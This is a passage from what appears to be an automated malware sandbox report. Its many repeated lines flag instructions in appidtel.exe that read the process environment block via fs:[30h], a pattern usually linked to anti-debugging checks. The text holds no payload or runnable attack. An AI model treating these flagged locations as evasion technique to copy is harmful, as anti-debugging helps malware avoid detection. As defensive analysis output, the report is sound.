              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D9179 mov eax, dword ptr fs:[00000030h]5_2_032D9179
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03315152 mov eax, dword ptr fs:[00000030h]5_2_03315152
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D4144 mov eax, dword ptr fs:[00000030h]5_2_032D4144
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D4144 mov eax, dword ptr fs:[00000030h]5_2_032D4144
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D4144 mov ecx, dword ptr fs:[00000030h]5_2_032D4144
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D4144 mov eax, dword ptr fs:[00000030h]5_2_032D4144
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D4144 mov eax, dword ptr fs:[00000030h]5_2_032D4144
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03239148 mov eax, dword ptr fs:[00000030h]5_2_03239148
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03239148 mov eax, dword ptr fs:[00000030h]5_2_03239148
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03239148 mov eax, dword ptr fs:[00000030h]5_2_03239148
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03239148 mov eax, dword ptr fs:[00000030h]5_2_03239148
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03246154 mov eax, dword ptr fs:[00000030h]5_2_03246154
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03246154 mov eax, dword ptr fs:[00000030h]5_2_03246154
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323C156 mov eax, dword ptr fs:[00000030h]5_2_0323C156
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D8158 mov eax, dword ptr fs:[00000030h]5_2_032D8158
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03247152 mov eax, dword ptr fs:[00000030h]5_2_03247152
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F11A4 mov eax, dword ptr fs:[00000030h]5_2_032F11A4
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F11A4 mov eax, dword ptr fs:[00000030h]5_2_032F11A4
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F11A4 mov eax, dword ptr fs:[00000030h]5_2_032F11A4
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F11A4 mov eax, dword ptr fs:[00000030h]5_2_032F11A4
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325B1B0 mov eax, dword ptr fs:[00000030h]5_2_0325B1B0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FC188 mov eax, dword ptr fs:[00000030h]5_2_032FC188
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FC188 mov eax, dword ptr fs:[00000030h]5_2_032FC188
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03280185 mov eax, dword ptr fs:[00000030h]5_2_03280185
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C019F mov eax, dword ptr fs:[00000030h]5_2_032C019F
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C019F mov eax, dword ptr fs:[00000030h]5_2_032C019F
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C019F mov eax, dword ptr fs:[00000030h]5_2_032C019F
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C019F mov eax, dword ptr fs:[00000030h]5_2_032C019F
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323A197 mov eax, dword ptr fs:[00000030h]5_2_0323A197
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323A197 mov eax, dword ptr fs:[00000030h]5_2_0323A197
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323A197 mov eax, dword ptr fs:[00000030h]5_2_0323A197
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03297190 mov eax, dword ptr fs:[00000030h]5_2_03297190
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032651EF mov eax, dword ptr fs:[00000030h]5_2_032651EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032651EF mov eax, dword ptr fs:[00000030h]5_2_032651EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032651EF mov eax, dword ptr fs:[00000030h]5_2_032651EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032651EF mov eax, dword ptr fs:[00000030h]5_2_032651EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032651EF mov eax, dword ptr fs:[00000030h]5_2_032651EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032651EF mov eax, dword ptr fs:[00000030h]5_2_032651EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032651EF mov eax, dword ptr fs:[00000030h]5_2_032651EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032651EF mov eax, dword ptr fs:[00000030h]5_2_032651EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032651EF mov eax, dword ptr fs:[00000030h]5_2_032651EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032651EF mov eax, dword ptr fs:[00000030h]5_2_032651EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032651EF mov eax, dword ptr fs:[00000030h]5_2_032651EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032651EF mov eax, dword ptr fs:[00000030h]5_2_032651EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032651EF mov eax, dword ptr fs:[00000030h]5_2_032651EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032451ED mov eax, dword ptr fs:[00000030h]5_2_032451ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033161E5 mov eax, dword ptr fs:[00000030h]5_2_033161E5
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032E71F9 mov esi, dword ptr fs:[00000030h]5_2_032E71F9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032701F8 mov eax, dword ptr fs:[00000030h]5_2_032701F8
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033061C3 mov eax, dword ptr fs:[00000030h]5_2_033061C3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033061C3 mov eax, dword ptr fs:[00000030h]5_2_033061C3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327D1D0 mov eax, dword ptr fs:[00000030h]5_2_0327D1D0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327D1D0 mov ecx, dword ptr fs:[00000030h]5_2_0327D1D0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033151CB mov eax, dword ptr fs:[00000030h]5_2_033151CB
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BE1D0 mov eax, dword ptr fs:[00000030h]5_2_032BE1D0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BE1D0 mov eax, dword ptr fs:[00000030h]5_2_032BE1D0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BE1D0 mov ecx, dword ptr fs:[00000030h]5_2_032BE1D0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BE1D0 mov eax, dword ptr fs:[00000030h]5_2_032BE1D0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BE1D0 mov eax, dword ptr fs:[00000030h]5_2_032BE1D0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323A020 mov eax, dword ptr fs:[00000030h]5_2_0323A020
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323C020 mov eax, dword ptr fs:[00000030h]5_2_0323C020
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330903E mov eax, dword ptr fs:[00000030h]5_2_0330903E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330903E mov eax, dword ptr fs:[00000030h]5_2_0330903E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330903E mov eax, dword ptr fs:[00000030h]5_2_0330903E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330903E mov eax, dword ptr fs:[00000030h]5_2_0330903E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C4000 mov ecx, dword ptr fs:[00000030h]5_2_032C4000
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325E016 mov eax, dword ptr fs:[00000030h]5_2_0325E016
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325E016 mov eax, dword ptr fs:[00000030h]5_2_0325E016
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325E016 mov eax, dword ptr fs:[00000030h]5_2_0325E016
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325E016 mov eax, dword ptr fs:[00000030h]5_2_0325E016
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C106E mov eax, dword ptr fs:[00000030h]5_2_032C106E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03315060 mov eax, dword ptr fs:[00000030h]5_2_03315060
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251070 mov eax, dword ptr fs:[00000030h]5_2_03251070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251070 mov ecx, dword ptr fs:[00000030h]5_2_03251070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251070 mov eax, dword ptr fs:[00000030h]5_2_03251070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251070 mov eax, dword ptr fs:[00000030h]5_2_03251070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251070 mov eax, dword ptr fs:[00000030h]5_2_03251070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251070 mov eax, dword ptr fs:[00000030h]5_2_03251070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251070 mov eax, dword ptr fs:[00000030h]5_2_03251070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251070 mov eax, dword ptr fs:[00000030h]5_2_03251070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251070 mov eax, dword ptr fs:[00000030h]5_2_03251070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251070 mov eax, dword ptr fs:[00000030h]5_2_03251070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251070 mov eax, dword ptr fs:[00000030h]5_2_03251070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251070 mov eax, dword ptr fs:[00000030h]5_2_03251070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251070 mov eax, dword ptr fs:[00000030h]5_2_03251070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326C073 mov eax, dword ptr fs:[00000030h]5_2_0326C073
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BD070 mov ecx, dword ptr fs:[00000030h]5_2_032BD070
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032E705E mov ebx, dword ptr fs:[00000030h]5_2_032E705E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032E705E mov eax, dword ptr fs:[00000030h]5_2_032E705E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03242050 mov eax, dword ptr fs:[00000030h]5_2_03242050
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326B052 mov eax, dword ptr fs:[00000030h]5_2_0326B052
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C6050 mov eax, dword ptr fs:[00000030h]5_2_032C6050
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D80A8 mov eax, dword ptr fs:[00000030h]5_2_032D80A8
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033060B8 mov eax, dword ptr fs:[00000030h]5_2_033060B8
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033060B8 mov ecx, dword ptr fs:[00000030h]5_2_033060B8
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032CD080 mov eax, dword ptr fs:[00000030h]5_2_032CD080
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032CD080 mov eax, dword ptr fs:[00000030h]5_2_032CD080
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324208A mov eax, dword ptr fs:[00000030h]5_2_0324208A
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323D08D mov eax, dword ptr fs:[00000030h]5_2_0323D08D
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03245096 mov eax, dword ptr fs:[00000030h]5_2_03245096
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326D090 mov eax, dword ptr fs:[00000030h]5_2_0326D090
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326D090 mov eax, dword ptr fs:[00000030h]5_2_0326D090
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327909C mov eax, dword ptr fs:[00000030h]5_2_0327909C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0323A0E3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032650E4 mov eax, dword ptr fs:[00000030h]5_2_032650E4
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032650E4 mov ecx, dword ptr fs:[00000030h]5_2_032650E4
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C60E0 mov eax, dword ptr fs:[00000030h]5_2_032C60E0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032480E9 mov eax, dword ptr fs:[00000030h]5_2_032480E9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323C0F0 mov eax, dword ptr fs:[00000030h]5_2_0323C0F0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032820F0 mov ecx, dword ptr fs:[00000030h]5_2_032820F0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov ecx, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov ecx, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov ecx, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov ecx, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h]5_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033150D9 mov eax, dword ptr fs:[00000030h]5_2_033150D9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BD0C0 mov eax, dword ptr fs:[00000030h]5_2_032BD0C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BD0C0 mov eax, dword ptr fs:[00000030h]5_2_032BD0C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C20DE mov eax, dword ptr fs:[00000030h]5_2_032C20DE
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032690DB mov eax, dword ptr fs:[00000030h]5_2_032690DB
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FF72E mov eax, dword ptr fs:[00000030h]5_2_032FF72E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03243720 mov eax, dword ptr fs:[00000030h]5_2_03243720
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325F720 mov eax, dword ptr fs:[00000030h]5_2_0325F720
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325F720 mov eax, dword ptr fs:[00000030h]5_2_0325F720
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325F720 mov eax, dword ptr fs:[00000030h]5_2_0325F720
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327C720 mov eax, dword ptr fs:[00000030h]5_2_0327C720
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327C720 mov eax, dword ptr fs:[00000030h]5_2_0327C720
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0331B73C mov eax, dword ptr fs:[00000030h]5_2_0331B73C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0331B73C mov eax, dword ptr fs:[00000030h]5_2_0331B73C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0331B73C mov eax, dword ptr fs:[00000030h]5_2_0331B73C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0331B73C mov eax, dword ptr fs:[00000030h]5_2_0331B73C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03239730 mov eax, dword ptr fs:[00000030h]5_2_03239730
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03239730 mov eax, dword ptr fs:[00000030h]5_2_03239730
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03275734 mov eax, dword ptr fs:[00000030h]5_2_03275734
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327273C mov eax, dword ptr fs:[00000030h]5_2_0327273C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327273C mov ecx, dword ptr fs:[00000030h]5_2_0327273C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327273C mov eax, dword ptr fs:[00000030h]5_2_0327273C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BC730 mov eax, dword ptr fs:[00000030h]5_2_032BC730
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330972B mov eax, dword ptr fs:[00000030h]5_2_0330972B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324973A mov eax, dword ptr fs:[00000030h]5_2_0324973A
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324973A mov eax, dword ptr fs:[00000030h]5_2_0324973A
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03245702 mov eax, dword ptr fs:[00000030h]5_2_03245702
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03245702 mov eax, dword ptr fs:[00000030h]5_2_03245702
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03247703 mov eax, dword ptr fs:[00000030h]5_2_03247703
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327C700 mov eax, dword ptr fs:[00000030h]5_2_0327C700
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03240710 mov eax, dword ptr fs:[00000030h]5_2_03240710
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03270710 mov eax, dword ptr fs:[00000030h]5_2_03270710
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327F71F mov eax, dword ptr fs:[00000030h]5_2_0327F71F
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327F71F mov eax, dword ptr fs:[00000030h]5_2_0327F71F
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323B765 mov eax, dword ptr fs:[00000030h]5_2_0323B765
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323B765 mov eax, dword ptr fs:[00000030h]5_2_0323B765
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323B765 mov eax, dword ptr fs:[00000030h]5_2_0323B765
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323B765 mov eax, dword ptr fs:[00000030h]5_2_0323B765
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03248770 mov eax, dword ptr fs:[00000030h]5_2_03248770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250770 mov eax, dword ptr fs:[00000030h]5_2_03250770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250770 mov eax, dword ptr fs:[00000030h]5_2_03250770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250770 mov eax, dword ptr fs:[00000030h]5_2_03250770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250770 mov eax, dword ptr fs:[00000030h]5_2_03250770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250770 mov eax, dword ptr fs:[00000030h]5_2_03250770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250770 mov eax, dword ptr fs:[00000030h]5_2_03250770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250770 mov eax, dword ptr fs:[00000030h]5_2_03250770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250770 mov eax, dword ptr fs:[00000030h]5_2_03250770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250770 mov eax, dword ptr fs:[00000030h]5_2_03250770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250770 mov eax, dword ptr fs:[00000030h]5_2_03250770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250770 mov eax, dword ptr fs:[00000030h]5_2_03250770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250770 mov eax, dword ptr fs:[00000030h]5_2_03250770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03253740 mov eax, dword ptr fs:[00000030h]5_2_03253740
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03253740 mov eax, dword ptr fs:[00000030h]5_2_03253740
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03253740 mov eax, dword ptr fs:[00000030h]5_2_03253740
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327674D mov esi, dword ptr fs:[00000030h]5_2_0327674D
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327674D mov eax, dword ptr fs:[00000030h]5_2_0327674D
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327674D mov eax, dword ptr fs:[00000030h]5_2_0327674D
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032CE75D mov eax, dword ptr fs:[00000030h]5_2_032CE75D
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03240750 mov eax, dword ptr fs:[00000030h]5_2_03240750
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282750 mov eax, dword ptr fs:[00000030h]5_2_03282750
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282750 mov eax, dword ptr fs:[00000030h]5_2_03282750
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03313749 mov eax, dword ptr fs:[00000030h]5_2_03313749
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C4755 mov eax, dword ptr fs:[00000030h]5_2_032C4755
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032CF7AF mov eax, dword ptr fs:[00000030h]5_2_032CF7AF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032CF7AF mov eax, dword ptr fs:[00000030h]5_2_032CF7AF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032CF7AF mov eax, dword ptr fs:[00000030h]5_2_032CF7AF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032CF7AF mov eax, dword ptr fs:[00000030h]5_2_032CF7AF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032CF7AF mov eax, dword ptr fs:[00000030h]5_2_032CF7AF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C97A9 mov eax, dword ptr fs:[00000030h]5_2_032C97A9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033137B6 mov eax, dword ptr fs:[00000030h]5_2_033137B6
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032407AF mov eax, dword ptr fs:[00000030h]5_2_032407AF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326D7B0 mov eax, dword ptr fs:[00000030h]5_2_0326D7B0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h]5_2_0323F7BA
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h]5_2_0323F7BA
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h]5_2_0323F7BA
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h]5_2_0323F7BA
